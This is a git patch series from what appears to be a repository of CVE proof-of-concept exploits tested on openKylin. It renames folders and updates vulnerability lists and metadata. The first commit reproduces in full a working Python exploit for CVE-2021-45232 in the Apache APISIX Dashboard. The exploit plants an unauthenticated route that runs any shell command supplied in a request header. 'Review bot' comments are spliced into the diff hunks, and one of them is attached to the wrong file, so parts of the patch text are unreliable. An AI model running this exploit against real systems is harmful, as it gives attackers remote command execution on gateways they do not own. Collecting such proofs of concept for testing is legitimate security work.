From d18f0308989a2916600e44c1b67f4c2eb0e40830 Mon Sep 17 00:00:00 2001 
From: lastre3et Date: Mon, 8 May 2023 14:17:56 +0800 Subject: [PATCH 1/2] Update Repo Status. --- .../2021/cve-2021-45232/RedMe.md | 0 .../cve-2021-45232/apisix_dashboard_rce.py | 184 +++++++++--------- .../2021/yaml/ cve-2021-45232.yaml | 42 ++-- .../2022/cve-2022-24112/README.md | 0 .../2022/cve-2022-24112/apisix-exploit.py | 0 .../2022/yaml/CVE-2022-24112.yaml | 0 .../2020/CVE-2020-9490/README.md | 0 .../2020/CVE-2020-9490/apache_poc.py | 0 .../2020/yaml/CVE-2020-9490.yaml | 0 .../2021/CVE-2021-41773/README.md | 0 .../2021/CVE-2021-41773/exploit.py | 0 .../Pasted image 20220313024756.png | Bin .../Pasted image 20220313024903.png | Bin .../2021/CVE-2021-42013/PoC.sh | 0 .../2021/CVE-2021-42013/README.md | 0 .../2021/CVE-2021-42013/apache.png | Bin .../2021/yaml/CVE-2021-41773.yaml | 0 .../2021/yaml/CVE-2021-42013.yaml | 0 openkylin_list.yaml | 34 ++-- other_list.yaml | 20 +- ...\346\264\236\346\250\241\347\211\210.yaml" | 10 +- 21 files changed, 144 insertions(+), 146 deletions(-) rename cve/{Apache-APISIX => apache-Apsix}/2021/cve-2021-45232/RedMe.md (100%) rename cve/{Apache-APISIX => apache-Apsix}/2021/cve-2021-45232/apisix_dashboard_rce.py (96%) rename cve/{Apache-APISIX => apache-Apsix}/2021/yaml/ cve-2021-45232.yaml (97%) rename cve/{Apache-APISIX => apache-Apsix}/2022/cve-2022-24112/README.md (100%) rename cve/{Apache-APISIX => apache-Apsix}/2022/cve-2022-24112/apisix-exploit.py (100%) rename cve/{Apache-APISIX => apache-Apsix}/2022/yaml/CVE-2022-24112.yaml (100%) rename cve/{apache => apache-Httpd}/2020/CVE-2020-9490/README.md (100%) rename cve/{apache => apache-Httpd}/2020/CVE-2020-9490/apache_poc.py (100%) rename cve/{apache => apache-Httpd}/2020/yaml/CVE-2020-9490.yaml (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/README.md (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/exploit.py (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png (100%) rename cve/{apache => 
apache-Httpd}/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/PoC.sh (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/README.md (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/apache.png (100%) rename cve/{apache => apache-Httpd}/2021/yaml/CVE-2021-41773.yaml (100%) rename cve/{apache => apache-Httpd}/2021/yaml/CVE-2021-42013.yaml (100%) diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md b/cve/apache-Apsix/2021/cve-2021-45232/RedMe.md similarity index 100% rename from cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md rename to cve/apache-Apsix/2021/cve-2021-45232/RedMe.md diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py similarity index 96% rename from cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py rename to cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py index edd12c9f..30ebcda5 100644 --- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py +++ b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py 
@@ -1,93 +1,93 @@ -#!/usr/bin/env python3 -import zlib -import json -import random -import requests -import string -import sys -from urllib3.exceptions import InsecureRequestWarning - -# Suppress only the single warning from urllib3 needed. -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -eval_config = { - "Counsumers": [], - "Routes": [ - { - "id": str(random.randint(100000000000000000, 1000000000000000000)), - "create_time": 1640674554, - "update_time": 1640677637, - "uris": [ - "/rce" - ], - "name": "rce", - "methods": [ - "GET", - "POST", - "PUT", - "DELETE", - "PATCH", - "HEAD", - "OPTIONS", - "CONNECT", - "TRACE" - ], - "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", - "status": 1 - } - ], - "Services": [], - "SSLs": [], - "Upstreams": [], - "Scripts": [], - "GlobalPlugins": [], - "PluginConfigs": [] -} - - -def random_str(): - return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) - - -def calc_crc(data): - crc32 = zlib.crc32(data) & 0xffffffff - return crc32.to_bytes(4, byteorder="big") - - -def export_data(url): - r = requests.get(url + "/apisix/admin/migrate/export", verify=False) - return r.text[:-4] - - -def import_data(url, data): - data = json.dumps(data).encode() - crc32 = calc_crc(data) - - files = {"file": ("data", data + crc32, "text/data")} - resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) - # print(resp.text) - if resp.json().get("code", -1) == 0: - return True - else: - return False - - -if __name__ == "__main__": - if len(sys.argv) != 2: - print("python " + sys.argv[0] + " http://127.0.0.1:9000") - exit() - - url = sys.argv[1] - if url.endswith("/"): - url = url[:-1] - - uri = random_str() - eval_config["Routes"][0]["uris"] = [ "/" + uri] - eval_config["Routes"][0]["name"] = uri - - if import_data(url, eval_config): - print("attack success") - print("uri is: " + 
"/" + uri) - else: +#!/usr/bin/env python3 +import zlib +import json +import random +import requests +import string +import sys +from urllib3.exceptions import InsecureRequestWarning + +# Suppress only the single warning from urllib3 needed. +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + + +eval_config = { + "Counsumers": [], + "Routes": [ + { + "id": str(random.randint(100000000000000000, 1000000000000000000)), + "create_time": 1640674554, + "update_time": 1640677637, + "uris": [ + "/rce" + ], + "name": "rce", + "methods": [ + "GET", + "POST", + "PUT", + "DELETE", + "PATCH", + "HEAD", + "OPTIONS", + "CONNECT", + "TRACE" + ], + "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", + "status": 1 + } + ], + "Services": [], + "SSLs": [], + "Upstreams": [], + "Scripts": [], + "GlobalPlugins": [], + "PluginConfigs": [] +} + + +def random_str(): + return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) + + +def calc_crc(data): + crc32 = zlib.crc32(data) & 0xffffffff + return crc32.to_bytes(4, byteorder="big") + + +def export_data(url): + r = requests.get(url + "/apisix/admin/migrate/export", verify=False) + return r.text[:-4] + + +def import_data(url, data): + data = json.dumps(data).encode() + crc32 = calc_crc(data) + + files = {"file": ("data", data + crc32, "text/data")} + resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) + # print(resp.text) + if resp.json().get("code", -1) == 0: + return True + else: + return False + + +if __name__ == "__main__": + if len(sys.argv) != 2: + print("python " + sys.argv[0] + " http://127.0.0.1:9000") + exit() + + url = sys.argv[1] + if url.endswith("/"): + url = url[:-1] + + uri = random_str() + eval_config["Routes"][0]["uris"] = [ "/" + uri] + eval_config["Routes"][0]["name"] = uri + + if import_data(url, eval_config): + print("attack success") + print("uri is: " + 
"/" + uri) + else: print("attack error") \ No newline at end of file diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml similarity index 97% rename from cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml rename to cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml index ad102017..3041c776 100644 --- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml +++ b/cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml 
@@ -1,22 +1,22 @@
-id: CVE-2021-45232
-source: https://github.com/wuppp/cve-2021-45232-exp
-info:
- name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。
- severity: CRITICAL
- description:
- CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。
- scope-of-influence:
- In Apache APISIX Dashboard before 2.10.1
- reference:
- - http://www.openwall.com/lists/oss-security/2021/12/27/1
- - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232
- - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5
- - https://seclists.org/oss-sec/2021/q4/180
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2021-45232
- cwe-id: CWE-306
- cnvd-id: None
- kve-id: None
+id: CVE-2021-45232
+source: https://github.com/wuppp/cve-2021-45232-exp
+info:
+ name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。
+ severity: CRITICAL
+ description:
+ CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。
+ scope-of-influence:
+ In Apache APISIX Dashboard before 2.10.1
+ reference:
+ - http://www.openwall.com/lists/oss-security/2021/12/27/1
+ - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232
+ - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5
+ - https://seclists.org/oss-sec/2021/q4/180
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-45232
+ cwe-id: CWE-306
+ cnvd-id: None
+ kve-id: None
 tags: cve2021
\ No newline at end of file
diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/README.md b/cve/apache-Apsix/2022/cve-2022-24112/README.md
similarity index 100%
rename from cve/Apache-APISIX/2022/cve-2022-24112/README.md
rename to cve/apache-Apsix/2022/cve-2022-24112/README.md
diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py b/cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py similarity index 100% rename from cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py rename to cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml similarity index 100% rename from cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml rename to cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml diff --git a/cve/apache/2020/CVE-2020-9490/README.md b/cve/apache-Httpd/2020/CVE-2020-9490/README.md similarity index 100% rename from cve/apache/2020/CVE-2020-9490/README.md rename to cve/apache-Httpd/2020/CVE-2020-9490/README.md diff --git a/cve/apache/2020/CVE-2020-9490/apache_poc.py b/cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py similarity index 100% rename from cve/apache/2020/CVE-2020-9490/apache_poc.py rename to cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py diff --git a/cve/apache/2020/yaml/CVE-2020-9490.yaml b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml similarity index 100% rename from cve/apache/2020/yaml/CVE-2020-9490.yaml rename to cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml diff --git a/cve/apache/2021/CVE-2021-41773/README.md b/cve/apache-Httpd/2021/CVE-2021-41773/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-41773/README.md rename to cve/apache-Httpd/2021/CVE-2021-41773/README.md diff --git a/cve/apache/2021/CVE-2021-41773/exploit.py b/cve/apache-Httpd/2021/CVE-2021-41773/exploit.py similarity index 100% rename from cve/apache/2021/CVE-2021-41773/exploit.py rename to cve/apache-Httpd/2021/CVE-2021-41773/exploit.py 
diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png similarity index 100% rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png similarity index 100% rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png diff --git a/cve/apache/2021/CVE-2021-42013/PoC.sh b/cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh similarity index 100% rename from cve/apache/2021/CVE-2021-42013/PoC.sh rename to cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh diff --git a/cve/apache/2021/CVE-2021-42013/README.md b/cve/apache-Httpd/2021/CVE-2021-42013/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-42013/README.md rename to cve/apache-Httpd/2021/CVE-2021-42013/README.md diff --git a/cve/apache/2021/CVE-2021-42013/apache.png b/cve/apache-Httpd/2021/CVE-2021-42013/apache.png similarity index 100% rename from cve/apache/2021/CVE-2021-42013/apache.png rename to cve/apache-Httpd/2021/CVE-2021-42013/apache.png diff --git a/cve/apache/2021/yaml/CVE-2021-41773.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml similarity index 100% rename from cve/apache/2021/yaml/CVE-2021-41773.yaml rename to cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml diff --git a/cve/apache/2021/yaml/CVE-2021-42013.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml similarity index 100% rename from cve/apache/2021/yaml/CVE-2021-42013.yaml rename to cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 34ad6d59..a6752cda 100644 
--- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -1,13 +1,13 @@ #仓库收录漏洞列表,列表中的测试用例在openKylin发行版上测试通过,用例有效。 cve: - apache: + apache-Httpd: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 - apache-APISIX: + apache-Apisix: - CVE-2022-24112 - CVE-2021-45232 - apache-activemq: + apache-Activemq: - CVE-2020-13932 apache-CouchDB: - CVE-2022-24706 @@ -22,32 +22,31 @@ cve: - CVE-2021-26295 apache-Airflow: - CVE-2020-11978 - apache-log4j: + apache-Log4j: - CVE-2021-44228 - apache-solr: + apache-Solr: - CVE-2021-27905 - CVE-2019-0193 - apache-tomcat: + apache-Tomcat: - CVE-2022-29885 - CVE-2020-9484 - CVE-2020-1938 - CVE-2017-12617 + - CVE-2020-13935 apache-Spark: - CVE-2022-33891 apache-Flink: - CVE-2020-17518 - apache-tomcat: - - CVE-2020-13935 - apache-unomi: + apache-Unomi: - CVE-2020-13942 - apache-struts: + apache-Struts: - CVE-2019-0230 apache-Shiro: - CVE-2022-32532 - Influx-DB: - - CVE-2019-20933 apache-Commons: - CVE-2022-33980 + influx-DB: + - CVE-2019-20933 linux-kernel: - CVE-2021-4204 - CVE-2021-29155 @@ -170,17 +169,19 @@ cve: - CVE-2022-22965 - CVE-2022-22963 - CVE-2022-31692 + java-SE: + - CVE-2022-21449 webmin: - CVE-2019-12840 - CVE-2022-0824 - CVE-2022-36446 - CVE-2019-15107 - Zimbra: + zimbra: - CVE-2022-27925 - CVE-2022-37042 - Grafana: + grafana: - CVE-2021-43798 - Froxlor: + froxlor: - CVE-2021-42325 - CVE-2023-0315 - CVE-2023-0877 @@ -197,5 +198,4 @@ kve: - KVE-2022-0206 kylin-activation: - KVE-2022-0231 - Java-SE: - - CVE-2022-21449 + diff --git a/other_list.yaml b/other_list.yaml index bf286e5e..ea925499 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -19,11 +19,11 @@ cve: - CVE-2017-16995 polkit: - CVE-2021-3560 - Outlook: + outlook: - CVE-2023-23397 redis: - CVE-2022-0543 - EsFileExplorer: + esFileExplorer: - CVE-2019-6447 docker: - CVE-2019-5736 
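Review bot: The renamed key on the new side of the first hunk is `apache-Apisix:`, but the same commit renames the PoC directory to `cve/apache-Apsix/…` (see the rename entries in the preamble and the `diff --git` headers above), so the list and the tree now spell the product differently and `Apsix` reads as a typo of `Apisix`. If any tooling maps these list keys onto directories the lookup will miss; one of the two spellings should be changed so they match, and `apache-Apisix` is the one consistent with the product name `Apache APISIX` used in the yaml metadata. The remaining hunks in this file (merging the duplicate `apache-tomcat` entry, moving `Java-SE` from `kve:` to `cve:`) look correct as written.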
@@ -47,27 +47,25 @@ cve: - CVE-2022-34265 sudo: - CVE-2019-14287 - MinIO: + minIO: - CVE-2023-28432 - CVE-2023-28434 - WebLogic: + webLogic: - CVE-2023-21839 - Node.js: + node.js: - CVE-2021-21315 zabbix: - CVE-2022-23131 weblogic: - CVE-2022-2555 - CVE-2021-2109 - Zyxel: + zyxel: - CVE-2022-30525 - Gitlab: + gitlab: - CVE-2022-1175 -cnvd: - WordPress: + wordPress: - CVE-2019-8942 - CVE-2023-23488 - Zimbra: + zimbra: - CVE-2022-41352 cnvd: - diff --git "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" index 1de85f71..1de22702 100644 --- "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" +++ "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" @@ -10,10 +10,10 @@ info: reference: - 漏洞相关链接 classification: - cvss-metrics: CVSS:3.1 + cvss-metrics: CVSS向量 cvss-score: 漏洞评分 - cve-id: - cwe-id: - cnvd-id: - kve-id: + cve-id: CVE漏洞编号 + cwe-id: CWE编号 + cnvd-id: CNVD编号 + kve-id: KVE编号 tags: 漏洞标签 \ No newline at end of file -- Gitee From 5634d490deb67a95e3bab8abbce74d0650a7b443 Mon Sep 17 00:00:00 2001 From: lastre3et Date: Mon, 8 May 2023 14:23:16 +0800 Subject: [PATCH 2/2] Update Repo Status. --- .../2021/yaml/{ cve-2021-45232.yaml => cve-2021-45232.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename cve/apache-Apsix/2021/yaml/{ cve-2021-45232.yaml => cve-2021-45232.yaml} (91%) diff --git a/cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml similarity index 91% rename from cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml rename to cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml index 3041c776..0a99c9b6 100644 --- a/cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml +++ b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml 
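Review bot: On the new side of this hunk the `cve:` mapping in other_list.yaml carries both `webLogic:` (renamed from `WebLogic:`, holding CVE-2023-21839) and the untouched context key `weblogic:` (CVE-2022-2555, CVE-2021-2109); YAML treats them as distinct keys so nothing fails to parse, but the same product is now split across two entries that differ only by case, and any consumer grouping by key will report two products. Merging the three CVEs under a single `webLogic:` entry, the casing this commit applies elsewhere, and dropping the other would fix it. The hunk also appears to leave the trailing `cnvd:` with no value, which a parser reads as null rather than an empty mapping; if consumers expect a mapping, `cnvd: {}` is the explicit form.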
@@ -8,9 +8,9 @@ info:
 scope-of-influence:
 In Apache APISIX Dashboard before 2.10.1
 reference:
- - http://www.openwall.com/lists/oss-security/2021/12/27/1
- - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232
- - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5
+ - http://www.openwall.com/lists/oss-security/2021/12/27/1
+ - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232
+ - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5
 - https://seclists.org/oss-sec/2021/q4/180
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-- Gitee
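Review bot: Three of the four `reference` entries are re-indented here while the fourth, `- https://seclists.org/oss-sec/2021/q4/180`, stays as a context line at its previous column; the collapsed rendering hides the exact indentation, so it is not clear from the diff whether the three were aligned to the fourth or moved away from it. If the columns now differ, YAML either rejects the file or turns the seclists URL into a nested list instead of a fourth reference, so all four items should end on the same column and the file should be loaded with a YAML parser before merge. Whitespace-only hunks like this are easier to review with `git diff -w`, which would show this one as empty if the content is unchanged.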